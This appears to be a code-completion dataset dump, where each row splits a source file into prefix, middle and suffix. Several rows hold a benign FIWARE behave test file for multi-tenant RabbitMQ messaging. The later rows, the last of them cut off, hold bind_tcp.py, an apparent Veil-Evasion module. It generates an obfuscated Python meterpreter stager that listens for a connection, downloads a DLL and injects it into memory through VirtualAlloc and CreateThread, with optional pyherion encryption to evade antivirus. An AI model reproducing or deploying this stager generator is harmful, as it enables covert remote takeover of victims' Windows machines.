file_name
large_stringlengths 4
140
| prefix
large_stringlengths 0
39k
| suffix
large_stringlengths 0
36.1k
| middle
large_stringlengths 0
29.4k
| fim_type
large_stringclasses 4
values |
---|---|---|---|---|
multi_tenancy.py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with [email protected]
__author__ = "@jframos"
import behave
from behave import step
from hamcrest import assert_that, equal_to, is_, has_length
from commons.rabbit_utils import RabbitMQConsumer
import qautils.configuration.configuration_utils as configuration_utils
from fiwarefacts_client.window_size_model_utils import get_window_size_rabbitmq_message
from fiwarecloto_client.client import ClotoClient
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_PORT, \
PROPERTIES_CONFIG_SERVICE_HOST, PROPERTIES_CONFIG_SERVICE_USER, PROPERTIES_CONFIG_SERVICE_PASSWORD
from commons.constants import PROPERTIES_CONFIG_RABBITMQ_SERVICE, PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES, \
PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME, PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE, \
PROPERTIES_CONFIG_FACTS_SERVICE, PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID, \
FACTS_DEFAULT_WINDOW_SIZE, PROPERTIES_CONFIG_CLOTO_SERVICE
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_OS_USERNAME, \
PROPERTIES_CONFIG_SERVICE_OS_PASSWORD, PROPERTIES_CONFIG_SERVICE_RESOURCE, \
PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL, PROPERTIES_CONFIG_SERVICE_PROTOCOL
from commons.step_helpers import send_context_notification_step_helper
from qautils.dataset.dataset_utils import DatasetUtils
from commons.custom_asserts import is_message_in_consumer_list
behave.use_step_matcher("re")
_dataset_utils = DatasetUtils()
@step(u'the secondary tenant-id configured is registered in CLOTO component')
def given_tenant_id_is_registered_in_cloto(context):
context.secondary_tenant_id = \
configuration_utils.config[PROPERTIES_CONFIG_FACTS_SERVICE][PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID]
print ("> Initiating Cloto REST Client for the secondary Tenant")
context.secondary_cloto_client = ClotoClient(
username=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_USERNAME],
password=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_PASSWORD],
tenant_id=context.secondary_tenant_id,
auth_url=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL],
api_protocol=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_PROTOCOL],
api_host=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_HOST],
api_port=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_PORT],
api_resource=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_RESOURCE])
print ("> A GET request is executed to CLOTO component, "
"to init all data about that secondary tenant in its system.")
_, response = context.secondary_cloto_client.\
get_tenant_id_resource_client().get_tenant_id(context.secondary_tenant_id)
assert_that(response.ok,
"TenantId '{}' for testing cannot be "
"retrieved from CLOTO: Message: {}".format(context.secondary_tenant_id, response.text))
@step(u'the following notifications are received for "(?P<server_id>.*)" and secondary tenant-id with values')
@step(u'a context notification is received for "(?P<server_id>.*)" and secondary tenant-id with values')
def a_context_update_is_received_for_secondary_tenant(context, server_id):
send_context_notification_step_helper(context, context.secondary_tenant_id, server_id)
@step(u'a new secondary RabbitMQ consumer is looking into the configured message bus')
def new_secondaty_consumer_looking_for_messages(context):
# Init RabbitMQ consumer
context.secondaty_rabbitmq_consumer = RabbitMQConsumer(
amqp_host=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_HOST],
amqp_port=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_PORT],
amqp_user=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_USER],
amqp_password=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_PASSWORD])
facts_message_config = \
configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES]
context.secondaty_rabbitmq_consumer.exchange = \
facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME]
context.secondaty_rabbitmq_consumer.exchange_type = \
facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE]
# Append consumer to the 'context' consumer list
context.rabbitmq_consumer_list.append(context.secondaty_rabbitmq_consumer)
# Set default window size to 2 (FACTS) - Secondary Tenant
message = get_window_size_rabbitmq_message(context.secondary_tenant_id, FACTS_DEFAULT_WINDOW_SIZE)
context.rabbitmq_publisher.send_message(message)
# Run secondary consumer
context.secondaty_rabbitmq_consumer.routing_key = context.secondary_tenant_id
context.secondaty_rabbitmq_consumer.run_as_thread()
@step(u'the message sent to RabbitMQ with the secondary tenant has got the following monitoring attributes')
@step(u'the messages sent to RabbitMQ with the secondary tenant have got the following monitoring attributes')
def following_messages_are_sent_to_secondary_consumer(context):
for element in context.table.rows:
expected_message = dict(element.as_dict())
expected_message = _dataset_utils.prepare_data(expected_message)
assert_that(expected_message, is_message_in_consumer_list(context.secondaty_rabbitmq_consumer.message_list),
"A message with the expected content has not been received by the secondary RabbitMQ consumer")
@step(u'no messages have been received by the secondary RabbitMQ consumer')
def no_messages_received_for_secondary_tenant(context):
print ("> Received main list: " + str(context.secondaty_rabbitmq_consumer.message_list))
print ("> Received seconday list: " + str(context.rabbitmq_consumer.message_list))
assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(0), |
@step(u'"(?P<number_of_notifications>.*)" notification is sent to RabbitMQ with the secondary tenant')
@step(u'"(?P<number_of_notifications>.*)" notifications are sent to RabbitMQ with the secondary tenant')
def notifications_are_received_by_secondary_consumer(context, number_of_notifications):
assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(int(number_of_notifications)),
"Secondary RabbitMQ consumer has NOT retrieved the expected number of messages from the bus")
@step(u'window size is set to "(?P<window_size>.*)" for the secondary tenant')
def window_size_is_set(context, window_size):
message = get_window_size_rabbitmq_message(context.secondary_tenant_id, window_size)
context.rabbitmq_publisher.send_message(message) | "Secondary RabbitMQ consumer has retrieved messages from the bus, and it should NOT")
| random_line_split |
multi_tenancy.py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with [email protected]
__author__ = "@jframos"
import behave
from behave import step
from hamcrest import assert_that, equal_to, is_, has_length
from commons.rabbit_utils import RabbitMQConsumer
import qautils.configuration.configuration_utils as configuration_utils
from fiwarefacts_client.window_size_model_utils import get_window_size_rabbitmq_message
from fiwarecloto_client.client import ClotoClient
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_PORT, \
PROPERTIES_CONFIG_SERVICE_HOST, PROPERTIES_CONFIG_SERVICE_USER, PROPERTIES_CONFIG_SERVICE_PASSWORD
from commons.constants import PROPERTIES_CONFIG_RABBITMQ_SERVICE, PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES, \
PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME, PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE, \
PROPERTIES_CONFIG_FACTS_SERVICE, PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID, \
FACTS_DEFAULT_WINDOW_SIZE, PROPERTIES_CONFIG_CLOTO_SERVICE
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_OS_USERNAME, \
PROPERTIES_CONFIG_SERVICE_OS_PASSWORD, PROPERTIES_CONFIG_SERVICE_RESOURCE, \
PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL, PROPERTIES_CONFIG_SERVICE_PROTOCOL
from commons.step_helpers import send_context_notification_step_helper
from qautils.dataset.dataset_utils import DatasetUtils
from commons.custom_asserts import is_message_in_consumer_list
behave.use_step_matcher("re")
_dataset_utils = DatasetUtils()
@step(u'the secondary tenant-id configured is registered in CLOTO component')
def given_tenant_id_is_registered_in_cloto(context):
context.secondary_tenant_id = \
configuration_utils.config[PROPERTIES_CONFIG_FACTS_SERVICE][PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID]
print ("> Initiating Cloto REST Client for the secondary Tenant")
context.secondary_cloto_client = ClotoClient(
username=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_USERNAME],
password=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_PASSWORD],
tenant_id=context.secondary_tenant_id,
auth_url=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL],
api_protocol=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_PROTOCOL],
api_host=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_HOST],
api_port=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_PORT],
api_resource=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_RESOURCE])
print ("> A GET request is executed to CLOTO component, "
"to init all data about that secondary tenant in its system.")
_, response = context.secondary_cloto_client.\
get_tenant_id_resource_client().get_tenant_id(context.secondary_tenant_id)
assert_that(response.ok,
"TenantId '{}' for testing cannot be "
"retrieved from CLOTO: Message: {}".format(context.secondary_tenant_id, response.text))
@step(u'the following notifications are received for "(?P<server_id>.*)" and secondary tenant-id with values')
@step(u'a context notification is received for "(?P<server_id>.*)" and secondary tenant-id with values')
def a_context_update_is_received_for_secondary_tenant(context, server_id):
send_context_notification_step_helper(context, context.secondary_tenant_id, server_id)
@step(u'a new secondary RabbitMQ consumer is looking into the configured message bus')
def new_secondaty_consumer_looking_for_messages(context):
# Init RabbitMQ consumer
context.secondaty_rabbitmq_consumer = RabbitMQConsumer(
amqp_host=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_HOST],
amqp_port=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_PORT],
amqp_user=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_USER],
amqp_password=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_PASSWORD])
facts_message_config = \
configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES]
context.secondaty_rabbitmq_consumer.exchange = \
facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME]
context.secondaty_rabbitmq_consumer.exchange_type = \
facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE]
# Append consumer to the 'context' consumer list
context.rabbitmq_consumer_list.append(context.secondaty_rabbitmq_consumer)
# Set default window size to 2 (FACTS) - Secondary Tenant
message = get_window_size_rabbitmq_message(context.secondary_tenant_id, FACTS_DEFAULT_WINDOW_SIZE)
context.rabbitmq_publisher.send_message(message)
# Run secondary consumer
context.secondaty_rabbitmq_consumer.routing_key = context.secondary_tenant_id
context.secondaty_rabbitmq_consumer.run_as_thread()
@step(u'the message sent to RabbitMQ with the secondary tenant has got the following monitoring attributes')
@step(u'the messages sent to RabbitMQ with the secondary tenant have got the following monitoring attributes')
def following_messages_are_sent_to_secondary_consumer(context):
fo |
@step(u'no messages have been received by the secondary RabbitMQ consumer')
def no_messages_received_for_secondary_tenant(context):
print ("> Received main list: " + str(context.secondaty_rabbitmq_consumer.message_list))
print ("> Received seconday list: " + str(context.rabbitmq_consumer.message_list))
assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(0),
"Secondary RabbitMQ consumer has retrieved messages from the bus, and it should NOT")
@step(u'"(?P<number_of_notifications>.*)" notification is sent to RabbitMQ with the secondary tenant')
@step(u'"(?P<number_of_notifications>.*)" notifications are sent to RabbitMQ with the secondary tenant')
def notifications_are_received_by_secondary_consumer(context, number_of_notifications):
assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(int(number_of_notifications)),
"Secondary RabbitMQ consumer has NOT retrieved the expected number of messages from the bus")
@step(u'window size is set to "(?P<window_size>.*)" for the secondary tenant')
def window_size_is_set(context, window_size):
message = get_window_size_rabbitmq_message(context.secondary_tenant_id, window_size)
context.rabbitmq_publisher.send_message(message)
| r element in context.table.rows:
expected_message = dict(element.as_dict())
expected_message = _dataset_utils.prepare_data(expected_message)
assert_that(expected_message, is_message_in_consumer_list(context.secondaty_rabbitmq_consumer.message_list),
"A message with the expected content has not been received by the secondary RabbitMQ consumer")
| identifier_body |
multi_tenancy.py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with [email protected]
__author__ = "@jframos"
import behave
from behave import step
from hamcrest import assert_that, equal_to, is_, has_length
from commons.rabbit_utils import RabbitMQConsumer
import qautils.configuration.configuration_utils as configuration_utils
from fiwarefacts_client.window_size_model_utils import get_window_size_rabbitmq_message
from fiwarecloto_client.client import ClotoClient
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_PORT, \
PROPERTIES_CONFIG_SERVICE_HOST, PROPERTIES_CONFIG_SERVICE_USER, PROPERTIES_CONFIG_SERVICE_PASSWORD
from commons.constants import PROPERTIES_CONFIG_RABBITMQ_SERVICE, PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES, \
PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME, PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE, \
PROPERTIES_CONFIG_FACTS_SERVICE, PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID, \
FACTS_DEFAULT_WINDOW_SIZE, PROPERTIES_CONFIG_CLOTO_SERVICE
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_OS_USERNAME, \
PROPERTIES_CONFIG_SERVICE_OS_PASSWORD, PROPERTIES_CONFIG_SERVICE_RESOURCE, \
PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL, PROPERTIES_CONFIG_SERVICE_PROTOCOL
from commons.step_helpers import send_context_notification_step_helper
from qautils.dataset.dataset_utils import DatasetUtils
from commons.custom_asserts import is_message_in_consumer_list
behave.use_step_matcher("re")
_dataset_utils = DatasetUtils()
@step(u'the secondary tenant-id configured is registered in CLOTO component')
def gi | ontext):
context.secondary_tenant_id = \
configuration_utils.config[PROPERTIES_CONFIG_FACTS_SERVICE][PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID]
print ("> Initiating Cloto REST Client for the secondary Tenant")
context.secondary_cloto_client = ClotoClient(
username=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_USERNAME],
password=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_PASSWORD],
tenant_id=context.secondary_tenant_id,
auth_url=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL],
api_protocol=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_PROTOCOL],
api_host=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_HOST],
api_port=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_PORT],
api_resource=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_RESOURCE])
print ("> A GET request is executed to CLOTO component, "
"to init all data about that secondary tenant in its system.")
_, response = context.secondary_cloto_client.\
get_tenant_id_resource_client().get_tenant_id(context.secondary_tenant_id)
assert_that(response.ok,
"TenantId '{}' for testing cannot be "
"retrieved from CLOTO: Message: {}".format(context.secondary_tenant_id, response.text))
@step(u'the following notifications are received for "(?P<server_id>.*)" and secondary tenant-id with values')
@step(u'a context notification is received for "(?P<server_id>.*)" and secondary tenant-id with values')
def a_context_update_is_received_for_secondary_tenant(context, server_id):
send_context_notification_step_helper(context, context.secondary_tenant_id, server_id)
@step(u'a new secondary RabbitMQ consumer is looking into the configured message bus')
def new_secondaty_consumer_looking_for_messages(context):
# Init RabbitMQ consumer
context.secondaty_rabbitmq_consumer = RabbitMQConsumer(
amqp_host=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_HOST],
amqp_port=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_PORT],
amqp_user=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_USER],
amqp_password=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_PASSWORD])
facts_message_config = \
configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES]
context.secondaty_rabbitmq_consumer.exchange = \
facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME]
context.secondaty_rabbitmq_consumer.exchange_type = \
facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE]
# Append consumer to the 'context' consumer list
context.rabbitmq_consumer_list.append(context.secondaty_rabbitmq_consumer)
# Set default window size to 2 (FACTS) - Secondary Tenant
message = get_window_size_rabbitmq_message(context.secondary_tenant_id, FACTS_DEFAULT_WINDOW_SIZE)
context.rabbitmq_publisher.send_message(message)
# Run secondary consumer
context.secondaty_rabbitmq_consumer.routing_key = context.secondary_tenant_id
context.secondaty_rabbitmq_consumer.run_as_thread()
@step(u'the message sent to RabbitMQ with the secondary tenant has got the following monitoring attributes')
@step(u'the messages sent to RabbitMQ with the secondary tenant have got the following monitoring attributes')
def following_messages_are_sent_to_secondary_consumer(context):
for element in context.table.rows:
expected_message = dict(element.as_dict())
expected_message = _dataset_utils.prepare_data(expected_message)
assert_that(expected_message, is_message_in_consumer_list(context.secondaty_rabbitmq_consumer.message_list),
"A message with the expected content has not been received by the secondary RabbitMQ consumer")
@step(u'no messages have been received by the secondary RabbitMQ consumer')
def no_messages_received_for_secondary_tenant(context):
print ("> Received main list: " + str(context.secondaty_rabbitmq_consumer.message_list))
print ("> Received seconday list: " + str(context.rabbitmq_consumer.message_list))
assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(0),
"Secondary RabbitMQ consumer has retrieved messages from the bus, and it should NOT")
@step(u'"(?P<number_of_notifications>.*)" notification is sent to RabbitMQ with the secondary tenant')
@step(u'"(?P<number_of_notifications>.*)" notifications are sent to RabbitMQ with the secondary tenant')
def notifications_are_received_by_secondary_consumer(context, number_of_notifications):
assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(int(number_of_notifications)),
"Secondary RabbitMQ consumer has NOT retrieved the expected number of messages from the bus")
@step(u'window size is set to "(?P<window_size>.*)" for the secondary tenant')
def window_size_is_set(context, window_size):
message = get_window_size_rabbitmq_message(context.secondary_tenant_id, window_size)
context.rabbitmq_publisher.send_message(message)
| ven_tenant_id_is_registered_in_cloto(c | identifier_name |
bind_tcp.py | """
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
self.rating = "Excellent"
self.name = "Pure Python Reverse TCP stager"
self.path = "python/meterpreter/bind_tcp"
self.cli_opts = cli_obj
self.payload_source_code = ""
self.language = "python"
self.extension = "py"
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
# optional
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"RHOST" : ["", "The listen target address"],
"LPORT" : ["4444", "The listen port"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"]}
def | (self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketName)
payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
| generate | identifier_name |
bind_tcp.py | """
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
| self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
self.rating = "Excellent"
self.name = "Pure Python Reverse TCP stager"
self.path = "python/meterpreter/bind_tcp"
self.cli_opts = cli_obj
self.payload_source_code = ""
self.language = "python"
self.extension = "py"
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
# optional
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"RHOST" : ["", "The listen target address"],
"LPORT" : ["4444", "The listen port"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"]}
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketName)
payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
